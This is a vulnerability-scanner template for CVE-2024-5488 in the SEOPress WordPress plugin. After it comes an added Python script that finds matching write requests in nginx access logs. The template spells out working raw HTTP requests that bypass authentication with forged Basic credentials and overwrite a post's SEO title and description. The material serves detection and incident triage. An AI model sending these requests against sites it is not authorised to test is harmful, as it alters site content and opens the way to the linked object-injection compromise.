SEOPress < 7.9 - Authentication Bypass

ID: CVE-2024-5488

Severity: critical

Author: pdresearch,iamnoooob,rootxharsh

Tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass

The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.

id: CVE-2024-5488

info:
  name: SEOPress < 7.9 - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
  reference:
    - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
    - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5488
    epss-score: 0.00043
    epss-percentile: 0.09608
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass

flow: http(1) && http(2) && http(3)

variables:
  marker: "{{randstr}}"
  username: "admin"

http:
  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'Sorry, you are not allowed to do that.'
        internal: true

  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':aaaaaa')}}
        Content-Type: application/x-www-form-urlencoded

        title={{marker}}&description={{marker}}

    matchers:
      - type: word
        part: body
        words:
          - '"code":"success"'
        internal: true

  - raw:
      - |
        GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"title":"{{marker}}","description":"{{marker}}"'
# digest: 490a00463044022014441a862df27db62f282d955bd45a4aede72ee80a8c22a19043cb7b0a0348ff0220104e1a5a55e39836f0daa40e534aff2e9dbc25eeb58094b905dec7265f1bf597:922c64590222798bb761d5b6d8e72950

This template detects the vulnerability described above in WordPress sites running SEOPress. Run it with the Nuclei tool against a target URL:

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5488.yaml"
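
For triage on a site that ran SEOPress before 7.9, the write requests this template sends can be looked for in web server access logs. The following is an added example, not part of the Nuclei template or of SEOPress. It assumes nginx `combined` log format (whose third field is the Basic-auth user name), assumes an accepted write logs a 2xx status, generalises the post ID from 1 to any number, and runs on constructed sample lines.

```python
import re

# Assumed nginx "combined" layout: ip - user [time] "METHOD path proto" status ...
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# REST route taken from the template; the post ID may be any number.
ROUTE = re.compile(
    r'^/wp-json/seopress/v1/posts/(\d+)/title-description-metas/?(?:\?|$)'
)

def find_suspect_writes(lines):
    """Return one finding per accepted PUT to the SEOPress meta route."""
    rejected_from = set()  # clients whose write to the route was refused earlier
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "PUT":
            continue  # unparsable line, or a read that changes nothing
        route = ROUTE.match(m["path"])
        if not route:
            continue
        if not m["status"].startswith("2"):
            rejected_from.add(m["ip"])  # a refused write is the expected outcome
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "post_id": int(route.group(1)),
            # "-" in the user field means no Basic credentials were sent
            "basic_user": None if m["user"] == "-" else m["user"],
            # refused first, then accepted: same order as the template's requests
            "after_rejection": m["ip"] in rejected_from,
        })
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2024:10:01:02 +0000] "PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 401 112 "-" "curl/8.0"',
    '203.0.113.7 - admin [12/Jun/2024:10:01:03 +0000] "PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 200 64 "-" "curl/8.0"',
    '203.0.113.7 - - [12/Jun/2024:10:01:04 +0000] "GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 200 90 "-" "curl/8.0"',
    '198.51.100.9 - - [12/Jun/2024:10:05:00 +0000] "PUT /wp-json/seopress/v1/posts/42/title-description-metas HTTP/1.1" 403 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspect_writes(SAMPLE_LOG):
        print(finding)
```

A hit is a lead for review rather than proof, since a legitimately authenticated client writing to this route is logged the same way. Compare the post's current SEO title and description against what the site's editors expect.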